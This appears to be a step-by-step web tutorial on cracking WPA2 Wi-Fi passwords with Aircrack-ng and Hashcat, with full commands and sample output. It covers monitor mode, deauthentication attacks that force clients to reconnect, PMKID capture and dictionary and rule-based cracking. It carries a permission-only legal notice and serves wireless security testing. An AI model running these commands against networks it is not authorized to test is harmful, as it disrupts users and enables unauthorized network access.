}

Aircrack-ng WPA2 Handshake Capture and Crack Tutorial (2026)

Last updated: 8 min read

Last updated: March 2026

Aircrack-ng WPA2 Handshake Capture and Crack Tutorial (2026)

To crack a WPA2 password with Aircrack-ng: put your adapter in monitor mode with airmon-ng, capture packets with airodump-ng, force a handshake using aireplay-ng -0, then crack the saved .cap file with aircrack-ng -w rockyou.txt capture.cap. For GPU-accelerated cracking, convert to .hc22000 format and use Hashcat mode 22000.

Legal notice: Only perform wireless security testing on networks you own or have explicit written permission to test. Unauthorized access to WiFi networks is illegal under the CFAA, Computer Misuse Act, and equivalent laws worldwide.

What You Need

  • Kali Linux (or Debian with aircrack-ng installed)
  • A USB WiFi adapter that supports monitor mode and packet injection
  • The target network's SSID and BSSID (your own network for testing)
  • A wordlist file (e.g., /usr/share/wordlists/rockyou.txt)

For adapter recommendations, see the Best USB WiFi Adapters for Kali Linux 2026. The Alfa AWUS036NHA (AR9271 chipset) and the Alfa AWUS036ACH (RTL8812AU chipset, kernel 6.14+) are both well-tested options.

Step 1: Verify Aircrack-ng is Installed

aircrack-ng --version

Expected output:

Aircrack-ng 1.7  r0
Copyright (C) 2006-2022 Thomas d'Otreppe de Bouvette, Mandriva S.A.
...

On Kali Linux, aircrack-ng is pre-installed. For Debian or other distros, see How to Install Aircrack-ng on Debian and Kali.

Step 2: Identify Your WiFi Interface

iw dev

Or:

iwconfig

Note the interface name — typically wlan0 or wlan1 for a USB adapter. Internal adapters often appear as wlan0; a second USB adapter would be wlan1.

# Also check with ip link
ip link show

Step 3: Enable Monitor Mode

Kill Interfering Processes

NetworkManager and wpa_supplicant interfere with monitor mode. Kill them first:

sudo airmon-ng check kill

Expected output:

Killing these processes:
  PID Name
  1234 wpa_supplicant
  5678 NetworkManager

Start Monitor Mode

sudo airmon-ng start wlan0

Expected output:

PHY     Interface       Driver          Chipset
phy0    wlan0           ath9k_htc       Atheros Communications AR9271 802.11n

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Your interface is now renamed to wlan0mon. Verify:

iw dev
# Should show: type monitor

Alternative: Enable Monitor Mode Manually

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
iw dev wlan0 info

Step 4: Scan for WiFi Networks

sudo airodump-ng wlan0mon

This displays all detected access points in real time:

 CH  9 ][ Elapsed: 12 s ][ 2026-03-26 10:05

 BSSID              PWR  Beacons    #Data  #/s  CH   MB   ENC CIPHER  AUTH ESSID
 AA:BB:CC:DD:EE:FF  -42       23        4    0   6  130   WPA2 CCMP   PSK  MyHomeNetwork
 11:22:33:44:55:66  -67       12        0    0  11  130   WPA2 CCMP   PSK  Neighbor_WiFi
 99:88:77:66:55:44  -71        8        2    0   1   54   WPA2 CCMP   PSK  AnotherNetwork

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 AA:BB:CC:DD:EE:FF  CC:DD:EE:FF:00:11  -55    1 -  1      0       12

Note the following for your target network: - BSSID: The access point MAC address (e.g., AA:BB:CC:DD:EE:FF) - CH: The WiFi channel (e.g., 6) - ESSID: The network name

Press Ctrl+C to stop the scan once you have identified your target.

Step 5: Capture the WPA2 Handshake

Lock airodump-ng onto your target network and save the capture:

sudo airodump-ng \
  -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w capture \
  wlan0mon

Flags: - -c 6 — Lock to channel 6 (the channel your target is on) - --bssid AA:BB:CC:DD:EE:FF — Filter to only the target AP - -w capture — Write capture files (creates capture-01.cap, capture-01.csv, etc.)

airodump-ng now waits for a device to connect to the AP. When a handshake is captured, you will see:

 CH  6 ][ Elapsed: 1 min ][ 2026-03-26 10:06 ][ WPA handshake: AA:BB:CC:DD:EE:FF

Leave this terminal running and proceed to Step 6 to force a handshake.

Step 6: Force a Handshake with Deauthentication

A WPA2 handshake is only exchanged when a client connects to the AP. Rather than waiting for a client to naturally reconnect, you can send deauthentication frames to force a reconnect.

Open a second terminal and run:

sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

Flags: - -0 5 — Send 5 deauthentication packets (deauth attack) - -a AA:BB:CC:DD:EE:FF — Target the access point

To target a specific connected client (gentler, less disruptive to others):

sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

Where -c CC:DD:EE:FF:00:11 is the client's MAC address from the airodump-ng STATION column.

Expected output:

10:06:45  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:FF) on channel 6
10:06:45  Sending 64 directed DeAuth (code 7). STMAC: [CC:DD:EE:FF:00:11] [34|63 ACKs]
10:06:46  Sending 64 directed DeAuth (code 7). STMAC: [CC:DD:EE:FF:00:11] [34|63 ACKs]

After the deauth, the client will automatically reconnect, and airodump-ng will capture the WPA2 handshake.

Step 7: Verify the Handshake was Captured

In the airodump-ng terminal, look for:

WPA handshake: AA:BB:CC:DD:EE:FF

This confirmation appears in the top right of the airodump-ng display. Press Ctrl+C to stop the capture.

Check the capture file:

ls -lh capture-01.cap
# -rw-r--r-- 1 root root 284K Mar 26 10:07 capture-01.cap

Verify the handshake using aircrack-ng without a wordlist:

aircrack-ng capture-01.cap

Output confirms a valid handshake:

Opening capture-01.cap
Read 12345 packets.

   #  BSSID              ESSID                     Encryption

   1  AA:BB:CC:DD:EE:FF  MyHomeNetwork             WPA (1 handshake)

Step 8: Crack the Handshake with Aircrack-ng

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

Expected output (when password found):

                              Aircrack-ng 1.7

      [00:00:03] 45896/14344391 keys tested (14356.45 k/s)

      Time left: 16 minutes, 20 seconds                          0.32%

                       KEY FOUND! [ password123 ]

      Master Key     : A2 3F 4D ...
      Transient Key  : B9 12 CD ...

      EAPOL HMAC     : 3A 45 7C ...

If the password is not in rockyou.txt, aircrack-ng will exhaust the list:

Passphrase not in dictionary

In that case, try additional wordlists or rules with Hashcat (see Step 9).

Step 9: GPU-Accelerated Cracking with Hashcat (Mode 22000)

Hashcat is significantly faster than aircrack-ng for WPA2 cracking, especially with a GPU. The RTX 4090 achieves ~2,600 kH/s on WPA2 vs aircrack-ng's ~14,000 k/s on CPU.

Convert .cap to .hc22000 Format

# Install hcxtools
sudo apt install hcxtools

# Convert capture file
hcxpcapngtool -o capture.hc22000 capture-01.cap

Expected output:

[+] 1 EAPOL pair(s) written to capture.hc22000

Crack with Hashcat

# Basic dictionary attack
hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt

# With optimized kernels and high workload
hashcat -m 22000 -a 0 -O -w 3 capture.hc22000 /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 22000 -a 0 \
  -r /usr/share/hashcat/rules/best64.rule \
  capture.hc22000 \
  /usr/share/wordlists/rockyou.txt

Hashcat output when password is found:

AA:BB:CC:DD:EE:FF:MyHomeNetwork:password123

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)

For full Hashcat usage, including hash modes and GPU optimization, see: - Hashcat Wordlist Attack Tutorial - Hashcat GPU Benchmark Table 2026

Step 10: Re-enable Managed Mode

When you are done, restore normal WiFi operation:

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart NetworkManager
sudo systemctl start NetworkManager

Troubleshooting

No Handshake Captured

  • Ensure a client is associated with the AP before sending deauth
  • Move physically closer to the AP
  • Try increasing deauth count: aireplay-ng -0 10 ...
  • Confirm you are on the correct channel
  • Some modern routers handle deauth more gracefully — try PMKID capture instead (see below)

PMKID Capture (No Client Needed)

Modern WPA2 networks often expose the PMKID in beacon frames, eliminating the need for a connected client:

# Install hcxdumptool
sudo apt install hcxdumptool

# Capture PMKID
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Convert to Hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Crack with Hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

Injection Test Fails

sudo aireplay-ng --test wlan0mon

If injection fails, check your adapter supports injection (see Best USB WiFi Adapters for Kali Linux 2026) and ensure airmon-ng check kill was run.

FAQ

Q: Do I need a special WiFi adapter for this? A: Yes. Your laptop's built-in WiFi adapter almost certainly does not support monitor mode or packet injection. You need a USB adapter with a compatible chipset. The Alfa AWUS036NHA (AR9271), Alfa AWUS036ACH (RTL8812AU), and TP-Link TL-WN722N v1 (AR9271) are reliable choices. See the adapter guide for full details.

Q: Why is aircrack-ng slow compared to Hashcat? A: Aircrack-ng uses CPU-based cracking, typically reaching ~14,000 keys/second on a modern processor. Hashcat uses GPU compute (CUDA/OpenCL), achieving ~2,600,000 keys/second on an RTX 4090 — about 185x faster. Always use Hashcat for serious WPA2 cracking.

Q: What if the password is not in rockyou.txt? A: Try larger wordlists (SecLists, rockyou2021), add Hashcat rules (best64.rule, OneRuleToRuleThemAll), or use mask attacks for known password patterns. See Hashcat Rule-Based Attacks for advanced techniques.

Related Articles